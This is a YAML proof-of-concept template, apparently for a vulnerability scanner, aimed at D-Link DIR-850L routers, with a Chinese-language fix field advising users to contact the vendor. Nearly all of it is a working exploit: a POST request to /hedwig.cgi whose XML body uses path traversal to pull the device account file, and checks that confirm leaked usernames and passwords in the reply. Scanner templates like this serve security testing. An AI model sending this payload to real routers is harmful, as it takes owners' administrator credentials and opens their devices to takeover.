product: D-Link
vName: poc-yaml-dlink-850l-info-leak
type: ''
vID: []
level: 3
vDesc: ''
version: Dir-850L
note: ''
search: {}
protocol: http
link: https://xz.aliyun.com/t/2941
fix:
- 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
- exp:
    method: post
    follow: false
    path: /hedwig.cgi
    header:
      Content-Type: text/xml
      Cookie: uid=R8tBjwtFc8
    data: <?xml version="1.0" encoding="utf-8"?><postxml><module><service>../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml</service></module></postxml>
  verify:
    path: ''
    logic: and
    check:
    - status: 200
      body:
        value:
        - </usrid>
        - </password>
        - <result>OK</result>
        logic: and
      header:
        value:
        - Content-Type
        - xml
        logic: and
